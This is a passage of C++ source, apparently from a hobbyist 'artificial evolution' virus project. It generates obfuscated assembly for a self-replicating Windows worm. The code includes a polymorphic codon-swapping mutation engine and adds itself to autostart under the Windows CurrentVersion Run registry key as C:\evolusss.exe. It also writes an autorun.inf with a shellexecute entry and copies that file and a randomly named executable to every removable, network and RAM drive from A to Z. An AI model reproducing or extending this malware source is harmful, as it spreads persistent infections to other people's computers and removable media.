2233file << " _pop ; remove trash" << endl; CreateAnIntron();
2234
2235
2236GetAddress("HGTDidInsert");
2237file << " _getdata" << endl; CreateAnIntron();
2238file << " _push ; 0...written / -1...not written" << endl; CreateAnIntron();
2239
2240GetAddress("WIN32_FIND_DATA_struct");
2241file << " _push" << endl; CreateAnIntron();
2242GetAddress("HGT_FFHandle");
2243file << " _getdata" << endl; CreateAnIntron();
2244file << " _push" << endl; CreateAnIntron();
2245
2246CallAPI("hFindNextFileA");
2247
2248
2249file << " _pop ; HGTDidInsert" << endl; CreateAnIntron();
2250file << " _save" << endl; CreateAnIntron();
2251file << " _nopsA ; If nonzero: Next file!" << endl; CreateAnIntron();
2252file << " _and" << endl; CreateAnIntron();
2253file << " _JnzUp ; End of the loop" << endl; CreateAnIntron();
2254
2255
2256file << " _push ; Trash to stack" << endl; CreateAnIntron();
2257file << " HGTEnd1:" << endl; CreateAnIntron();
2258
2259file << " _pop ; Align stack (Trash or Return address from _call)" << endl; CreateAnIntron();
2260
2261
2262
2263CalcNewRandNumberAndSaveIt();
2264
2265GetAddress("RPAminoAcid1");
2266file << " _saveWrtOff" << endl; CreateAnIntron();
2267
2268GetAddress("RandomNumber");
2269
2270file << " _getdata" << endl; CreateAnIntron();
2271file << " _nopdA ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
2272
2273
2274zer0(0);
2275file << " _nopdD ; mov edx, 0" << endl; CreateAnIntron();
2276
2277addnumber("256");
2278
2279file << " _div ; div ebx" << endl; CreateAnIntron();
2280
2281file << " _nopsD ; BC1=rand%256" << endl; CreateAnIntron();
2282
2283file << " _writeDWord ; Save amino acid to compare." << endl; CreateAnIntron();
2284
2285
2286file << " _push" << endl; CreateAnIntron();
2287zer0(0);
2288addnumber("3");
2289file << " _save" << endl; CreateAnIntron();
2290
2291file << " _pop" << endl; CreateAnIntron();
2292file << " _shl ; BC1=(rand%256)*8" << endl; CreateAnIntron();
2293file << " _save" << endl; CreateAnIntron();
2294
2295
2296GetAddress("MapPointer");
2297file << " _getdata" << endl; CreateAnIntron();
2298file << " _addsaved ; MapPoint+(rand%256)*8" << endl; CreateAnIntron();
2299
2300addnumber("(CodeStart+(StartAlphabeth-start))");
2301file << " _push" << endl; CreateAnIntron();
2302file << " _getdata" << endl; CreateAnIntron();
2303file << " _nopdA ; First 4 bytes of amino acid in RegA" << endl; CreateAnIntron();
2304
2305file << " _pop" << endl; CreateAnIntron();
2306addnumber("4");
2307file << " _getdata" << endl; CreateAnIntron();
2308file << " _nopdB ; 2nd 4 bytes of amino acid in RegB" << endl; CreateAnIntron();
2309
2310GetAddress("MapPointer");
2311file << " _getdata" << endl; CreateAnIntron();
2312
2313addnumber("(CodeStart+(StartAlphabeth-start))");
2314file << " _nopdD" << endl; CreateAnIntron();
2315
2316
2317file << " ; Start of loop:" << endl; CreateAnIntron();
2318file << " _getEIP" << endl; CreateAnIntron();
2319file << " _sub0001" << endl; CreateAnIntron();
2320file << " _sub0001" << endl; CreateAnIntron();
2321file << " _sub0001" << endl; CreateAnIntron();
2322file << " _sub0001" << endl; CreateAnIntron();
2323file << " _sub0001" << endl; CreateAnIntron();
2324file << " _saveJmpOff" << endl; CreateAnIntron();
2325
2326zer0(0);
2327addnumber("((RPBlock1End1-RPBlock1Start1)*8)");
2328file << " _save" << endl; CreateAnIntron();
2329
2330file << " _getEIP" << endl; CreateAnIntron();
2331
2332file << " RPBlock1Start1:" << endl; CreateAnIntron();
2333addnumber("3");
2334file << " _addsaved" << endl; CreateAnIntron();
2335file << " _push ; Save Addresse at Stack" << endl; CreateAnIntron();
2336
2337
2338file << " _pushall" << endl; CreateAnIntron();
2339CalcNewRandNumberAndSaveIt();
2340
2341GetAddress("RPAminoAcid2");
2342file << " _saveWrtOff" << endl; CreateAnIntron();
2343
2344GetAddress("RandomNumber");
2345
2346file << " _getdata" << endl; CreateAnIntron();
2347file << " _nopdA ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
2348
2349zer0(0);
2350file << " _nopdD ; mov edx, 0" << endl; CreateAnIntron();
2351
2352addnumber("256");
2353
2354file << " _div ; div ebx" << endl; CreateAnIntron();
2355
2356file << " _nopsD" << endl; CreateAnIntron();
2357file << " _writeDWord" << endl; CreateAnIntron();
2358
2359file << " _popall" << endl; CreateAnIntron();
2360
2361file << " _pushall" << endl; CreateAnIntron();
2362GetAddress("RPAminoAcid1");
2363file << " _getdata" << endl; CreateAnIntron();
2364file << " _nopdA" << endl; CreateAnIntron();
2365GetAddress("RPAminoAcid2");
2366file << " _getdata" << endl; CreateAnIntron();
2367file << " _nopdB" << endl; CreateAnIntron();
2368
2369file << " _popall" << endl; CreateAnIntron();
2370
2371zer0(0);
2372addnumber("3");
2373file << " _save" << endl; CreateAnIntron();
2374
2375GetAddress("RPAminoAcid2");
2376file << " _getdata" << endl; CreateAnIntron();
2377
2378file << " _shl ; *8" << endl; CreateAnIntron();
2379file << " _save" << endl; CreateAnIntron();
2380
2381file << " _nopsD ; Get start of Alphabeth in Map" << endl; CreateAnIntron();
2382
2383file << " _addsaved" << endl; CreateAnIntron();
2384
2385file << " _getdata" << endl; CreateAnIntron();
2386file << " _save" << endl; CreateAnIntron();
2387
2388file << " _nopsA" << endl; CreateAnIntron();
2389subsaved(0);
2390
2391file << " _JnzDown ; Simulate JzDown" << endl;
2392
2393file << " _nopREAL ; BC1=0" << endl;
2394file << " _nopREAL" << endl;
2395file << " _add0001" << endl;
2396file << " _JnzDown" << endl;
2397
2398file << " _nopREAL ; Not equal" << endl;
2399file << " _pop" << endl;
2400file << " _push" << endl;
2401file << " _call ; jmp to RPBlock1End" << endl;
2402
2403file << " ; First 4 bytes are equal" << endl; CreateAnIntron();
2404file << " _pop ; Old Call-address" << endl; CreateAnIntron();
2405
2406zer0(0);
2407addnumber("((RPBlock2End1-RPBlock2Start1)*8)");
2408file << " _save" << endl; CreateAnIntron();
2409
2410file << " _getEIP" << endl; CreateAnIntron();
2411
2412file << " RPBlock2Start1:" << endl; CreateAnIntron();
2413addnumber("3");
2414file << " _addsaved" << endl; CreateAnIntron();
2415file << " _push ; Save Addresse at Stack" << endl; CreateAnIntron();
2416
2417
2418zer0(0);
2419addnumber("3");
2420file << " _save" << endl; CreateAnIntron();
2421
2422GetAddress("RPAminoAcid2");
2423file << " _getdata" << endl; CreateAnIntron();
2424
2425file << " _shl ; *8" << endl; CreateAnIntron();
2426file << " _save" << endl; CreateAnIntron();
2427
2428file << " _nopsD ; Get start of Alphabeth in Map" << endl; CreateAnIntron();
2429
2430file << " _addsaved" << endl; CreateAnIntron();
2431
2432addnumber("4");
2433
2434file << " _getdata" << endl; CreateAnIntron();
2435file << " _save" << endl; CreateAnIntron();
2436
2437file << " _nopsB ; second 4 bytes" << endl; CreateAnIntron();
2438subsaved(0);
2439file << " _JnzDown" << endl;
2440
2441file << " _nopREAL ; BC1=0" << endl;
2442file << " _pop" << endl;
2443file << " _push" << endl;
2444file << " _call ; RPBlock2End" << endl;
2445
2446file << " _push ; not equal! trash to stack" << endl; CreateAnIntron();
2447
2448file << " RPBlock1End1: ; Not equal amino acids" << endl; CreateAnIntron();
2449file << " _pop ; remove " << static_cast<char>(34) << "call" << static_cast<char>(34) << "-return address" << endl; CreateAnIntron();
2450file << " _pop ; RPBlock1End-Jmp Address" << endl; CreateAnIntron();
2451
2452zer0(0);
2453addnumber("15");
2454file << " _save" << endl; CreateAnIntron();
2455
2456GetAddress("RandomNumber");
2457file << " _getdata ; BC1=random" << endl; CreateAnIntron();
2458
2459file << " _shr ; BC1=random >> 15 (to get new small random number without calling the 32bit RND engine again)" << endl; CreateAnIntron();
2460file << " _and ; BC1=(random >> 15) % 0000 1111b" << endl; CreateAnIntron();
2461file << " _JnzUp ; If not zero -> Next loop!" << endl; CreateAnIntron();
2462
2463
2464file << " ; Not found any equivalences..." << endl; CreateAnIntron();
2465
2466zer0(0);
2467addnumber("((RPBlock3End1-RPBlock3Start1)*8)");
2468file << " _save" << endl; CreateAnIntron();
2469
2470file << " _getEIP" << endl; CreateAnIntron();
2471
2472file << " RPBlock3Start1:" << endl; CreateAnIntron();
2473addnumber("3");
2474file << " _addsaved" << endl; CreateAnIntron();
2475
2476file << " _call ; jmp to end of poly-engine: RPBlock3End" << endl; CreateAnIntron();
2477
2478
2479
2480
2481file << " RPBlock2End1: ; Equal amino acids found" << endl; CreateAnIntron();
2482file << " _pop ; remove " << static_cast<char>(34) << "call" << static_cast<char>(34) << "-return address" << endl; CreateAnIntron();
2483file << " _pop ; RPBlock2End-Jmp Address" << endl; CreateAnIntron();
2484
2485
2486GetAddress("MapPointer");
2487file << " _getdata" << endl; CreateAnIntron();
2488
2489addnumber("(CodeStart+(StAmino-start))");
2490file << " _nopdD" << endl; CreateAnIntron();
2491
2492GetAddress("RPAminoAcid1");
2493file << " _getdata" << endl; CreateAnIntron();
2494file << " _nopdA" << endl; CreateAnIntron();
2495
2496GetAddress("RPAminoAcid2");
2497file << " _getdata" << endl; CreateAnIntron();
2498file << " _nopdB" << endl; CreateAnIntron();
2499
2500zer0(0);
2501GetAddress("FileSize");
2502file << " _getdata" << endl; CreateAnIntron();
2503addnumber("(0xFFFFFFFF-(CodeStart+(StAmino-start))-1000)");
2504file << " _push" << endl; CreateAnIntron();
2505
2506file << " _getEIP" << endl; CreateAnIntron();
2507file << " _sub0001" << endl; CreateAnIntron();
2508file << " _sub0001" << endl; CreateAnIntron();
2509file << " _sub0001" << endl; CreateAnIntron();
2510file << " _sub0001" << endl; CreateAnIntron();
2511file << " _sub0001" << endl; CreateAnIntron();
2512file << " _saveJmpOff" << endl; CreateAnIntron();
2513
2514file << " _nopsD ; Codon-Sequence Start" << endl; CreateAnIntron();
2515file << " _save" << endl; CreateAnIntron();
2516
2517file << " _pop" << endl; CreateAnIntron();
2518file << " _push ; counter" << endl; CreateAnIntron();
2519
2520file << " _addsaved" << endl; CreateAnIntron();
2521file << " _saveWrtOff" << endl; CreateAnIntron();
2522file << " _getdata" << endl; CreateAnIntron();
2523file << " _push" << endl; CreateAnIntron();
2524
2525zer0(0);
2526addnumber("255");
2527file << " _save" << endl; CreateAnIntron();
2528file << " _pop" << endl; CreateAnIntron();
2529file << " _and ; BC1=one byte" << endl; CreateAnIntron();
2530file << " _save" << endl; CreateAnIntron();
2531
2532file << " _nopsA" << endl; CreateAnIntron();
2533
2534subsaved(0);
2535file << " _JnzDown" << endl;
2536file << " _nopsB" << endl;
2537file << " _writeByte ; If equal: exchange codon!" << endl;
2538file << " _nopREAL" << endl;
2539file << " _nopREAL" << endl;
2540
2541file << " _pushall" << endl; CreateAnIntron();
2542CalcNewRandNumberAndSaveIt();
2543file << " _popall" << endl; CreateAnIntron();
2544
2545zer0(0);
2546addnumber("1");
2547file << " _save" << endl; CreateAnIntron();
2548
2549GetAddress("RandomNumber");
2550file << " _getdata" << endl; CreateAnIntron();
2551file << " _and" << endl; CreateAnIntron();
2552addnumber("1");
2553file << " _save ; BC2=(rand%8)+1" << endl; CreateAnIntron();
2554
2555file << " _pop" << endl; CreateAnIntron();
2556subsaved(0);
2557file << " _push" << endl; CreateAnIntron();
2558
2559zer0(0);
2560addnumber("4293918720");
2561file << " _save" << endl; CreateAnIntron();
2562file << " _pop" << endl; CreateAnIntron();
2563file << " _push" << endl; CreateAnIntron();
2564file << " _and ; BC1=(counter%0xFFF0 0000)" << endl; CreateAnIntron();
2565
2566file << " _JnzDown" << endl;
2567file << " _add0001 ; Not finished" << endl;
2568file << " _JnzUp ; Next step" << endl;
2569file << " _nopREAL" << endl;
2570file << " _nopREAL" << endl;
2571
2572
2573file << " _pop ; counter away from stack" << endl; CreateAnIntron();
2574file << " _push ; trash" << endl; CreateAnIntron();
2575
2576file << " RPBlock3End1:" << endl; CreateAnIntron();
2577file << " _pop ; return value from call" << endl; CreateAnIntron();
2578
2579
2580GetAddress("MapPointer");
2581file << " _getdata" << endl; CreateAnIntron();
2582file << " _push" << endl; CreateAnIntron();
2583CallAPI("hUnmapViewOfFile");
2584
2585GetAddress("MapHandle");
2586file << " _getdata" << endl; CreateAnIntron();
2587file << " _push" << endl; CreateAnIntron();
2588CallAPI("hCloseHandle");
2589
2590GetAddress("FileHandle");
2591file << " _getdata" << endl; CreateAnIntron();
2592file << " _push" << endl; CreateAnIntron();
2593CallAPI("hCloseHandle");
2594
2595
2596GetAddress("AutoStartContentStart");
2597file << " _saveWrtOff" << endl; CreateAnIntron();
2598file << " _nopdA" << endl; CreateAnIntron();
2599
2600GetAddress("stSubKey");
2601file << " _nopdA" << endl; CreateAnIntron();
2602file << " _saveWrtOff" << endl; CreateAnIntron();
2603zer0(0);
2604addnumber("\'SOFT\'");
2605file << " _writeDWord" << endl; CreateAnIntron();
2606
2607file << " _nopsA" << endl; CreateAnIntron();
2608addnumber("4");
2609file << " _nopdA" << endl; CreateAnIntron();
2610file << " _saveWrtOff" << endl; CreateAnIntron();
2611zer0(0);
2612addnumber("\'WARE\'");
2613file << " _writeDWord" << endl; CreateAnIntron();
2614
2615file << " _nopsA" << endl; CreateAnIntron();
2616addnumber("4");
2617file << " _nopdA" << endl; CreateAnIntron();
2618file << " _saveWrtOff" << endl; CreateAnIntron();
2619zer0(0);
2620addnumber("\'\\Mic\'");
2621file << " _writeDWord" << endl; CreateAnIntron();
2622
2623file << " _nopsA" << endl; CreateAnIntron();
2624addnumber("4");
2625file << " _nopdA" << endl; CreateAnIntron();
2626file << " _saveWrtOff" << endl; CreateAnIntron();
2627zer0(0);
2628addnumber("\'roso\'");
2629file << " _writeDWord" << endl; CreateAnIntron();
2630
2631file << " _nopsA" << endl; CreateAnIntron();
2632addnumber("4");
2633file << " _nopdA" << endl; CreateAnIntron();
2634file << " _saveWrtOff" << endl; CreateAnIntron();
2635zer0(0);
2636addnumber("\'ft\\W\'");
2637file << " _writeDWord" << endl; CreateAnIntron();
2638
2639file << " _nopsA" << endl; CreateAnIntron();
2640addnumber("4");
2641file << " _nopdA" << endl; CreateAnIntron();
2642file << " _saveWrtOff" << endl; CreateAnIntron();
2643zer0(0);
2644addnumber("\'indo\'");
2645file << " _writeDWord" << endl; CreateAnIntron();
2646
2647file << " _nopsA" << endl; CreateAnIntron();
2648addnumber("4");
2649file << " _nopdA" << endl; CreateAnIntron();
2650file << " _saveWrtOff" << endl; CreateAnIntron();
2651zer0(0);
2652addnumber("\'ws\\C\'");
2653file << " _writeDWord" << endl; CreateAnIntron();
2654
2655file << " _nopsA" << endl; CreateAnIntron();
2656addnumber("4");
2657file << " _nopdA" << endl; CreateAnIntron();
2658file << " _saveWrtOff" << endl; CreateAnIntron();
2659zer0(0);
2660addnumber("\'urre\'");
2661file << " _writeDWord" << endl; CreateAnIntron();
2662
2663file << " _nopsA" << endl; CreateAnIntron();
2664addnumber("4");
2665file << " _nopdA" << endl; CreateAnIntron();
2666file << " _saveWrtOff" << endl; CreateAnIntron();
2667zer0(0);
2668addnumber("\'ntVe\'");
2669file << " _writeDWord" << endl; CreateAnIntron();
2670
2671file << " _nopsA" << endl; CreateAnIntron();
2672addnumber("4");
2673file << " _nopdA" << endl; CreateAnIntron();
2674file << " _saveWrtOff" << endl; CreateAnIntron();
2675zer0(0);
2676addnumber("\'rsio\'");
2677file << " _writeDWord" << endl; CreateAnIntron();
2678
2679file << " _nopsA" << endl; CreateAnIntron();
2680addnumber("4");
2681file << " _nopdA" << endl; CreateAnIntron();
2682file << " _saveWrtOff" << endl; CreateAnIntron();
2683zer0(0);
2684addnumber("\'n\\Ru\'");
2685file << " _writeDWord" << endl; CreateAnIntron();
2686
2687file << " _nopsA" << endl; CreateAnIntron();
2688addnumber("4");
2689file << " _saveWrtOff" << endl; CreateAnIntron();
2690zer0(0);
2691addnumber("\'n\'");
2692file << " _writeDWord" << endl; CreateAnIntron();
2693
2694
2695GetAddress("hRegKey");
2696file << " _push" << endl; CreateAnIntron();
2697GetAddress("stSubKey");
2698file << " _push" << endl; CreateAnIntron();
2699zer0(0);
2700addnumber("HKEY_LOCAL_MACHINE");
2701file << " _push" << endl; CreateAnIntron();
2702CallAPI("hRegCreateKeyA");
2703
2704zer0(0);
2705addnumber("15");
2706file << " _push ; 15" << endl; CreateAnIntron();
2707GetAddress("Driveletter3");
2708file << " _push ; C:" << static_cast<char>(92) << "evolusss.exe" << endl; CreateAnIntron();
2709zer0(0);
2710addnumber("REG_SZ");
2711file << " _push ; REG_SZ" << endl; CreateAnIntron();
2712zer0(0);
2713file << " _push ; 0x0" << endl; CreateAnIntron();
2714file << " _push ; 0x0" << endl; CreateAnIntron();
2715GetAddress("hRegKey");
2716file << " _getdata" << endl; CreateAnIntron();
2717file << " _push ; dword[hRegKey]" << endl; CreateAnIntron();
2718CallAPI("hRegSetValueExA");
2719
2720GetAddress("AutoStartContentStart");
2721file << " _nopdA" << endl; CreateAnIntron();
2722file << " _saveWrtOff" << endl; CreateAnIntron();
2723zer0(0);
2724addnumber("\'[Aut\'");
2725file << " _writeDWord" << endl; CreateAnIntron();
2726
2727file << " _nopsA" << endl; CreateAnIntron();
2728addnumber("4");
2729file << " _nopdA" << endl; CreateAnIntron();
2730file << " _saveWrtOff" << endl; CreateAnIntron();
2731zer0(0);
2732addnumber("\'orun\'");
2733file << " _writeDWord" << endl; CreateAnIntron();
2734
2735file << " _nopsA" << endl; CreateAnIntron();
2736addnumber("4");
2737file << " _nopdA" << endl; CreateAnIntron();
2738file << " _saveWrtOff" << endl; CreateAnIntron();
2739zer0(0);
2740addnumber("0x530A0D5D");
2741file << " _writeDWord" << endl; CreateAnIntron();
2742
2743file << " _nopsA" << endl; CreateAnIntron();
2744addnumber("4");
2745file << " _nopdA" << endl; CreateAnIntron();
2746file << " _saveWrtOff" << endl; CreateAnIntron();
2747zer0(0);
2748addnumber("\'hell\'");
2749file << " _writeDWord" << endl; CreateAnIntron();
2750
2751file << " _nopsA" << endl; CreateAnIntron();
2752addnumber("4");
2753file << " _nopdA" << endl; CreateAnIntron();
2754file << " _saveWrtOff" << endl; CreateAnIntron();
2755zer0(0);
2756addnumber("\'Exec\'");
2757file << " _writeDWord" << endl; CreateAnIntron();
2758
2759file << " _nopsA" << endl; CreateAnIntron();
2760addnumber("4");
2761file << " _nopdA" << endl; CreateAnIntron();
2762file << " _saveWrtOff" << endl; CreateAnIntron();
2763zer0(0);
2764addnumber("\'ute=\'");
2765file << " _writeDWord" << endl; CreateAnIntron();
2766
2767file << " _nopsA" << endl; CreateAnIntron();
2768addnumber("4");
2769file << " _nopdA" << endl; CreateAnIntron();
2770file << " _saveWrtOff" << endl; CreateAnIntron();
2771GetAddress("RandomFileName");
2772file << " _nopdB" << endl; CreateAnIntron();
2773file << " _getdata" << endl; CreateAnIntron();
2774file << " _writeDWord" << endl; CreateAnIntron();
2775
2776file << " _nopsA" << endl; CreateAnIntron();
2777addnumber("4");
2778file << " _nopdA" << endl; CreateAnIntron();
2779file << " _saveWrtOff" << endl; CreateAnIntron();
2780file << " _nopsB" << endl; CreateAnIntron();
2781addnumber("4");
2782file << " _getdata" << endl; CreateAnIntron();
2783file << " _writeDWord" << endl; CreateAnIntron();
2784
2785file << " _nopsA" << endl; CreateAnIntron();
2786addnumber("4");
2787file << " _nopdA" << endl; CreateAnIntron();
2788file << " _saveWrtOff" << endl; CreateAnIntron();
2789zer0(0);
2790addnumber("\'.exe\'");
2791file << " _writeDWord" << endl; CreateAnIntron();
2792
2793file << " _nopsA" << endl; CreateAnIntron();
2794addnumber("4");
2795file << " _nopdA" << endl; CreateAnIntron();
2796file << " _saveWrtOff" << endl; CreateAnIntron();
2797zer0(0);
2798addnumber("0x73550A0D");
2799file << " _writeDWord" << endl; CreateAnIntron();
2800
2801file << " _nopsA" << endl; CreateAnIntron();
2802addnumber("4");
2803file << " _nopdA" << endl; CreateAnIntron();
2804file << " _saveWrtOff" << endl; CreateAnIntron();
2805zer0(0);
2806addnumber("\'eAut\'");
2807file << " _writeDWord" << endl; CreateAnIntron();
2808
2809file << " _nopsA" << endl; CreateAnIntron();
2810addnumber("4");
2811file << " _nopdA" << endl; CreateAnIntron();
2812file << " _saveWrtOff" << endl; CreateAnIntron();
2813zer0(0);
2814addnumber("\'opla\'");
2815file << " _writeDWord" << endl; CreateAnIntron();
2816
2817file << " _nopsA" << endl; CreateAnIntron();
2818addnumber("3");
2819file << " _nopdA" << endl; CreateAnIntron();
2820file << " _saveWrtOff" << endl; CreateAnIntron();
2821zer0(0);
2822addnumber("\'ay=1\'");
2823file << " _writeDWord" << endl; CreateAnIntron();
2824
2825GetAddress("autoruninf");
2826file << " _nopdA" << endl; CreateAnIntron();
2827file << " _saveWrtOff" << endl; CreateAnIntron();
2828zer0(0);
2829addnumber("\'auto\'");
2830file << " _writeDWord" << endl; CreateAnIntron();
2831
2832file << " _nopsA" << endl; CreateAnIntron();
2833addnumber("4");
2834file << " _nopdA" << endl; CreateAnIntron();
2835file << " _saveWrtOff" << endl; CreateAnIntron();
2836zer0(0);
2837addnumber("\'run.\'");
2838file << " _writeDWord" << endl; CreateAnIntron();
2839
2840file << " _nopsA" << endl; CreateAnIntron();
2841addnumber("3");
2842file << " _saveWrtOff" << endl; CreateAnIntron();
2843zer0(0);
2844addnumber("\'.inf\'");
2845file << " _writeDWord" << endl; CreateAnIntron();
2846
2847zer0(0);
2848file << " _push ; 0x0" << endl; CreateAnIntron();
2849addnumber("2");
2850file << " _push ; 0x2" << endl; CreateAnIntron();
2851zer0(0);
2852addnumber("CREATE_ALWAYS");
2853file << " _push ; CREATE_ALWAYS" << endl; CreateAnIntron();
2854zer0(0);
2855file << " _push ; 0x0" << endl; CreateAnIntron();
2856file << " _push ; 0x0" << endl; CreateAnIntron();
2857addnumber("0xC0000000");
2858file << " _push ; 0xC0000000" << endl; CreateAnIntron();
2859GetAddress("autoruninf");
2860file << " _push ; autoruninf" << endl; CreateAnIntron();
2861CallAPI("hCreateFileA");
2862
2863GetAddress("FileHandle");
2864file << " _saveWrtOff" << endl; CreateAnIntron();
2865file << " _nopsA" << endl; CreateAnIntron();
2866file << " _writeDWord ; dword[FileHandle]=eax" << endl; CreateAnIntron();
2867
2868zer0(0);
2869file << " _push ; 0x0" << endl; CreateAnIntron();
2870GetAddress("MapHandle");
2871file << " _push ; Trash-Address" << endl; CreateAnIntron();
2872zer0(0);
2873addnumber("(AutoStartContentEnd-AutoStartContentStart)");
2874file << " _push ; Size of Buffer" << endl; CreateAnIntron();
2875GetAddress("AutoStartContentStart");
2876file << " _push ; Buffer to write" << endl; CreateAnIntron();
2877GetAddress("FileHandle");
2878file << " _getdata" << endl; CreateAnIntron();
2879file << " _push ; FileHandle" << endl; CreateAnIntron();
2880CallAPI("hWriteFile");
2881
2882GetAddress("FileHandle");
2883file << " _getdata" << endl; CreateAnIntron();
2884file << " _push" << endl; CreateAnIntron();
2885CallAPI("hCloseHandle");
2886
2887file << " _getEIP" << endl; CreateAnIntron();
2888file << " _sub0001" << endl; CreateAnIntron();
2889file << " _sub0001" << endl; CreateAnIntron();
2890file << " _sub0001" << endl; CreateAnIntron();
2891file << " _sub0001" << endl; CreateAnIntron();
2892file << " _sub0001" << endl; CreateAnIntron();
2893file << " _saveJmpOff ; Loop over Drive Letter A-Z" << endl; CreateAnIntron();
2894
2895file << " _pushall" << endl; CreateAnIntron();
2896zer0(0);
2897file << " _nopdB ; RegB=0" << endl; CreateAnIntron();
2898file << " " << endl; CreateAnIntron();
2899GetAddress("Driveletter1-1");
2900file << " _saveWrtOff" << endl; CreateAnIntron();
2901zer0(0);
2902addnumber("0x003A4100");
2903file << " _writeDWord" << endl; CreateAnIntron();
2904file << " " << endl; CreateAnIntron();
2905GetAddress("Driveletter2-1");
2906file << " _saveWrtOff" << endl; CreateAnIntron();
2907zer0(0);
2908addnumber("0x5C3A4100");
2909file << " _writeDWord" << endl; CreateAnIntron();
2910file << " " << endl; CreateAnIntron();
2911file << " " << endl; CreateAnIntron();
2912zer0(0);
2913addnumber("26");
2914file << " _nopdA ; counter" << endl; CreateAnIntron();
2915file << " " << endl; CreateAnIntron();
2916file << " _getEIP" << endl; CreateAnIntron();
2917file << " _sub0001" << endl; CreateAnIntron();
2918file << " _sub0001" << endl; CreateAnIntron();
2919file << " _sub0001" << endl; CreateAnIntron();
2920file << " _sub0001" << endl; CreateAnIntron();
2921file << " _sub0001" << endl; CreateAnIntron();
2922file << " _saveJmpOff ; Loop over Drive Letter A-Z" << endl; CreateAnIntron();
2923
2924file << " _pushall" << endl; CreateAnIntron();
2925file << " " << endl; CreateAnIntron();
2926GetAddress("Driveletter1+2");
2927file << " _saveWrtOff" << endl; CreateAnIntron();
2928zer0(1);
2929file << " _writeByte" << endl; CreateAnIntron();
2930
2931GetAddress("Driveletter1");
2932file << " _push" << endl; CreateAnIntron();
2933CallAPI("hGetDriveTypeA");
2934
2935file << " _nopsA" << endl; CreateAnIntron();
2936file << " _save ; save Drive type" << endl; CreateAnIntron();
2937
2938zer0(1);
2939addnumber("0x0010");
2940file << " _push" << endl; CreateAnIntron();
2941
2942zer0(1);
2943addnumber("2");
2944subsaved(1);
2945file << " _JnzDown ; Is DRIVE_REMOVABLE?" << endl;
2946file << " _pop ; Stack=0x0010" << endl;
2947file << " _push" << endl;
2948file << " _nopdB ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2949file << " _nopREAL" << endl;
2950
2951file << " _pop ; Trash away" << endl; CreateAnIntron();
2952
2953zer0(1);
2954addnumber("0x0040");
2955file << " _push" << endl; CreateAnIntron();
2956
2957zer0(1);
2958addnumber("3");
2959subsaved(1);
2960file << " _JnzDown ; Is DRIVE_FIXED?" << endl;
2961file << " _pop" << endl;
2962file << " _push ; RegB=0x0040 -> FILE" << endl;
2963file << " _nopdB" << endl;
2964file << " _nopREAL" << endl;
2965
2966file << " _pop ; Trash away" << endl; CreateAnIntron();
2967
2968zer0(1);
2969addnumber("0x0010");
2970file << " _push" << endl; CreateAnIntron();
2971
2972zer0(1);
2973addnumber("4");
2974subsaved(1);
2975file << " _JnzDown ; Is DRIVE_REMOTE?" << endl;
2976file << " _pop" << endl;
2977file << " _push ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2978file << " _nopdB" << endl;
2979file << " _nopREAL" << endl;
2980
2981
2982zer0(1);
2983addnumber("6");
2984subsaved(1);
2985file << " _JnzDown ; Is DRIVE_RAMDISK?" << endl;
2986file << " _pop" << endl;
2987file << " _push ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2988file << " _nopdB" << endl;
2989file << " _nopREAL" << endl;
2990
2991file << " _pop ; Trash away" << endl; CreateAnIntron();
2992
2993file << " ; ############################################################################" << endl; CreateAnIntron();
2994file << " ; ##### Copy autorun.inf (or not)" << endl; CreateAnIntron();
2995file << " " << endl; CreateAnIntron();
2996GetAddress("autoruninf");
2997file << " _nopdA ; address to " << static_cast<char>(34) << "autorun.inf" << static_cast<char>(34) << " to RegA" << endl; CreateAnIntron();
2998GetAddress("Driveletter2");
2999file << " _nopdD ; address to " << static_cast<char>(34) << "?:" << static_cast<char>(92) << "autorun.inf" << static_cast<char>(34) << " to RegD" << endl; CreateAnIntron();
3000file << " " << endl; CreateAnIntron();
3001file << " _nopsB" << endl; CreateAnIntron();
3002file << " _save" << endl; CreateAnIntron();
3003file << " " << endl; CreateAnIntron();
3004file << " " << endl; CreateAnIntron();
3005zer0(1);
3006addnumber("0x0010");
3007subsaved(1);
3008file << " _JnzDown" << endl;
3009file << " _nopREAL ; BC1=0x0" << endl;
3010file << " _push ; bFailIfExists=FALSE" << endl;
3011file << " _nopsD" << endl;
3012file << " _push ; lpNewFileName=" << static_cast<char>(34) << "?:" << static_cast<char>(92) << "autorun.inf" << static_cast<char>(34) << "" << endl;
3013file << " " << endl; CreateAnIntron();
3014file << " " << endl; CreateAnIntron();
3015GetAddress("hCopyFileA");
3016file << " _getdata" << endl; CreateAnIntron();
3017file << " _nopdD" << endl; CreateAnIntron();
3018file << " " << endl; CreateAnIntron();
3019zer0(1);
3020addnumber("0x0010");
3021subsaved(1);
3022file << " _JnzDown" << endl;
3023file << " _nopsA" << endl;
3024file << " _push ; lpExistingFileName=" << static_cast<char>(34) << "autorun.inf" << static_cast<char>(34) << "" << endl;
3025file << " _nopsD" << endl;
3026file << " _call ; stdcall dword[hCopyFileA]" << endl;
3027file << " " << endl; CreateAnIntron();
3028
3029file << " _nopsB" << endl; CreateAnIntron();
3030file << " _save ; restore BC2 (=RegB)" << endl; CreateAnIntron();
3031
3032zer0(1);
3033addnumber("0x0040");
3034file << " _push" << endl; CreateAnIntron();
3035
3036zer0(1);
3037addnumber("0x0010");
3038subsaved(1);
3039file << " _JnzDown" << endl;
3040file << " _pop" << endl;
3041file << " _push" << endl;
3042file << " _nopdB" << endl;
3043file << " _save ; also copy child executable" << endl;
3044
3045file << " _pop ; Trash away" << endl; CreateAnIntron();
3046
3047file << " " << endl; CreateAnIntron();
3048file << " ; ##### End Copy autorun.inf (or not)" << endl; CreateAnIntron();
3049file << " ; ############################################################################" << endl; CreateAnIntron();
3050
3051
3052file << " ; ############################################################################" << endl; CreateAnIntron();
3053file << " ; ##### Copy child executable (or not)" << endl; CreateAnIntron();
3054file << " " << endl; CreateAnIntron();
3055GetAddress("Driveletter1+2");
3056file << " _saveWrtOff" << endl; CreateAnIntron();
3057zer0(1);
3058addnumber("0x5C");
3059file << " _writeByte" << endl; CreateAnIntron();
3060file << " " << endl; CreateAnIntron();
3061GetAddress("RandomFileName");
3062file << " _nopdA ; address to " << static_cast<char>(34) << "NNNNNNNN.exe" << static_cast<char>(34) << " to RegA" << endl; CreateAnIntron();
3063GetAddress("Driveletter1");
